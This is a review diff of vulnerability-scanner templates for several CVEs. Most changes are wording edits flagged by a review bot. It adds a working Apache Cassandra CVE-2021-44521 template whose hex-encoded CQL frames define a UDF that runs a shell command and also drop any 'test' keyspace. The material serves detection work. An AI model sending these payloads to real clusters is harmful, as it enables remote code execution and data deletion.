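Review bot: the new `remediation` lists fixed versions without `or later`, unlike the other remediation lines in this diff (e.g. `Upgrade to Apache HTTP Server 2.4.51 or later.`). Phrase it the same way, since the 2.3.x, 2.12.x and 2.17.x branches have received further security releases after those versions and the security page in the first reference is the authoritative source for the current minimums.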
@ -68,3 +71,5 @@ requests:
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
# Enhanced by mp on 2022/02/28

View File

@ -4,7 +4,7 @@ info:
name: Rosario Student Information System Unauthenticated SQL Injection
author: furkansayim,xShuden
severity: critical
description: An unauthenticated SQL Injection vulnerability in Rosario Student Information System (aka rosariosis) 8.1 and below allow remote attackers to execute PostgreSQL statements (e.g., SELECT, INSERT, UPDATE, and DELETE) through /Side.php via the syear parameter.
description: An unauthenticated SQL injection vulnerability in Rosario Student Information System (aka rosariosis) 8.1 and below allow remote attackers to execute PostgreSQL statements (e.g., SELECT, INSERT, UPDATE, and DELETE) through /Side.php via the syear parameter.
remediation: Upgrade to version 8.1.1 or higher.
reference:
- https://gitlab.com/francoisjacquet/rosariosis/-/issues/328
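Review bot: subject-verb agreement: `An unauthenticated SQL injection vulnerability ... allow remote attackers` should be `allows remote attackers`.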
@ -42,3 +42,5 @@ requests:
part: header
words:
- "RosarioSIS="
# Enhanced by mp on 2022/02/28

View File

@ -0,0 +1,59 @@
id: CVE-2021-44521
info:
name: Apache Cassandra Load UDF RCE
author: Y4er
description: "When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE."
severity: critical
reference:
- https://y4er.com/post/cve-2021-44521-apache-cassandra-udf-rce/
- https://nvd.nist.gov/vuln/detail/CVE-2021-44521
- https://jfrog.com/blog/cve-2021-44521-exploiting-apache-cassandra-user-defined-functions-for-remote-code-execution/
tags: cve,cve2021,network,rce,apache,cassandra
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.10
cve-id: CVE-2021-44521
cwe-id: CWE-94
network:
- inputs:
- data: "050000000500000000"
read: 1024
type: hex
- data: "0500000101000000530003000b4452495645525f4e414d450016446174615374617820507974686f6e20447269766572000e4452495645525f56455253494f4e0006332e32352e30000b43514c5f56455253494f4e0005332e342e35"
read: 1024
type: hex
- data: "3e000218aeb50500000307000000350000001d64726f70204b455953504143452049462045584953545320746573743b0001000000340000006400080005d82cc8ca0e4fcdde8c0a"
read: 1024
type: hex
- data: "7f0002a6a69f0500000407000000760000005e435245415445204b4559535041434520746573742057495448207265706c69636174696f6e203d207b27636c617373273a202753696d706c655374726174656779272c20277265706c69636174696f6e5f666163746f7227203a20317d3b0001000000340000006400080005d82cc8ca390f0ddce06b"
read: 1024
type: hex
- data: "7d000296664f0500000807000000740000005c435245415445205441424c4520746573742e7263652028636d642076617263686172205052494d415259204b455929205749544820636f6d6d656e743d27496d706f7274616e742062696f6c6f676963616c207265636f726473273b0001000000340000006400080005d82cc8cb2fc161951510"
read: 1024
type: hex
- data: "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"
read: 1024
type: hex
- data: "51000278033505000014070000004800000030696e7365727420696e746f20746573742e72636528636d64292076616c75657328276563686f2031323331323327293b0001000000340000006400080005d82cc8cd5b810ef0b16e"
read: 1024
type: hex
- data: "450002bff1d805000015070000003c0000002473656c65637420746573742e6578656328636d64292066726f6d20746573742e7263653b0001000000340000006400080005d82cc8cd99d444271281"
read: 1024
type: hex
- data: "3e000218aeb50500000307000000350000001d64726f70204b455953504143452049462045584953545320746573743b0001000000340000006400080005d82cc8ca0e4fcdde8c0a"
type: hex
read: 1024
host:
- "{{Hostname}}"
- "{{Host}}:9042"
matchers:
- type: word
part: raw
words:
- "123123"
# Enhanced by mp on 2022/03/07
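Review bot: this template has destructive side effects that nothing in the file flags. The third and the last `data` payloads decode to `drop KEYSPACE IF EXISTS test;`, so any existing keyspace named `test` on the target is deleted, and in between the template creates `test.rce`, defines a UDF and runs `echo 123123` through it. Add an `intrusive` tag and state this in the description (or pick an unlikely keyspace name) so that users running the `cve` tag set do not drop data. Three smaller points: the description is one long quoted line in which the three `enable_*` settings run together, so a block scalar (`description: |`) with one setting per line, as the original BillQuick description used, would keep it readable; the frames go straight from STARTUP to QUERY with no AUTH_RESPONSE, so the check only completes against clusters with authentication disabled, which the description should say given `PR:H` in the vector; and `cvss-score: 9.10` should be `9.1`.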

View File

@ -35,3 +35,5 @@ requests:
- 302
- 307
- 308
# Enhanced by mp on 2022/02/28

View File

@ -34,3 +34,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/28

View File

@ -1,10 +1,10 @@
id: CVE-2021-45043
info:
name: HD-Network Real-time Monitoring System 2.0 - Local File Inclusion
name: HD-Network Realtime Monitoring System 2.0 - Local File Inclusion
author: Momen Eldawakhly,Evan Rubinstein
severity: high
description: Instances of HD-Netowrk Real-time Monitoring System version 2.0 are vulnerable to a Local File Inclusion (LFI) vulnerability which allows remote unauthenticate attackers to view important, confidnetial information.
description: Instances of HD-Network Realtime Monitoring System version 2.0 are vulnerable to a Local File Inclusion vulnerability which allows remote unauthenticated attackers to view confidential information.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-45043
- https://www.exploit-db.com/exploits/50588
@ -36,3 +36,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/28

View File

@ -1,10 +1,10 @@
id: CVE-2021-45046
info:
name: Remote code injection in Log4j
name: Apache Log4j2 Remote Code Injection
author: ImNightmaree
severity: critical
description: Apache Log4j2 Thread Context Lookup Pattern vulnerable to remote code execution in certain non-default configurations.
description: Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations.
reference:
- https://securitylab.github.com/advisories/GHSL-2021-1054_GHSL-2021-1055_log4j2/
- https://twitter.com/marcioalm/status/1471740771581652995
@ -64,3 +64,5 @@ requests:
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
# Enhanced by mp on 2022/02/28

View File

@ -4,7 +4,7 @@ info:
name: Thinfinity Iframe Injection
author: danielmofer
severity: critical
description: Thinfinity VirtualUI is a web remote desktop system, a vulnerability exist in a function located in /lab.html reachable by default that could allow IFRAME injection via the "vpath" parameter.
description: A vulnerability exists in Thinfinity VirtualUI in a function located in /lab.html reachable which by default could allow IFRAME injection via the "vpath" parameter.
reference:
- https://github.com/cybelesoft/virtualui/issues/2
- https://nvd.nist.gov/vuln/detail/CVE-2021-44848
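Review bot: the rewritten description is garbled: `located in /lab.html reachable which by default could allow` reads as though `which` modifies `reachable`. Suggest: `A vulnerability exists in a function in /lab.html of Thinfinity VirtualUI, reachable by default, that could allow IFRAME injection via the "vpath" parameter.`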
@ -26,4 +26,8 @@ requests:
regex:
- ".*vpath.*"
- "thinfinity"
condition: and
condition: and
# Enhanced by mp on 2022/02/28
# Enhanced by mp on 2022/02/28
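Review bot: the `# Enhanced by mp on 2022/02/28` comment is added twice (the last two `+` lines of this hunk); drop one.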

View File

@ -1,10 +1,11 @@
id: CVE-2021-45232
info:
name: Apache APISIX Dashboard api unauth access
name: Apache APISIX Dashboard API Unauthorized Access
author: Mr-xn
severity: critical
description: In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin`, all APIs and authentication middleware are developed based on framework `droplet`, but some API directly use the interface of framework `gin` thus bypassing the authentication.
description: In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin.' While all APIs and authentication middleware are developed based on framework `droplet`, some API directly use the interface of framework `gin` thus bypassing their authentication.
remediation: Upgrade to release 2.10.1 or later. Or, change the default username and password, and restrict the source IP to access the Apache APISIX Dashboard.
reference:
- https://apisix.apache.org/zh/blog/2021/12/28/dashboard-cve-2021-45232/
- https://github.com/pingpongcult/CVE-2021-45232
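Review bot: the quoting in the new description is mismatched: `` `gin.' `` opens with a backtick and closes with an apostrophe, with the sentence period trapped inside; it should be `` `gin`. `` Also `some API directly use` should be `some APIs directly use`, and `bypassing their authentication` reads better as `bypassing authentication`.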
@ -33,3 +34,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/28

View File

@ -1,10 +1,10 @@
id: CVE-2021-45380
info:
name: AppCMS - Reflected Cross-Site Scripting (XSS)
name: AppCMS - Reflected Cross-Site Scripting
author: pikpikcu
severity: medium
description: AppCMS 2.0.101 has a XSS injection vulnerability in \templates\m\inc_head.php
description: AppCMS 2.0.101 has a cross-site scripting vulnerability in \templates\m\inc_head.php.
reference:
- https://github.com/source-trace/appcms/issues/8
- https://nvd.nist.gov/vuln/detail/CVE-2021-45380
@ -36,3 +36,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/28

View File

@ -1,10 +1,10 @@
id: CVE-2021-46005
info:
name: Sourcecodester Car Rental Management System 1.0 - Stored XSS
name: Sourcecodester Car Rental Management System 1.0 - Stored Cross-Site Scripting
author: cckuailong
severity: medium
description: Sourcecodester Car Rental Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via vehicalorcview parameter.
description: Sourcecodester Car Rental Management System 1.0 is vulnerable to cross-site scripting via the vehicalorcview parameter.
reference:
- https://www.exploit-db.com/exploits/49546
- https://nvd.nist.gov/vuln/detail/CVE-2021-46005
@ -109,3 +109,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/28

Some files were not shown because too many files have changed in this diff.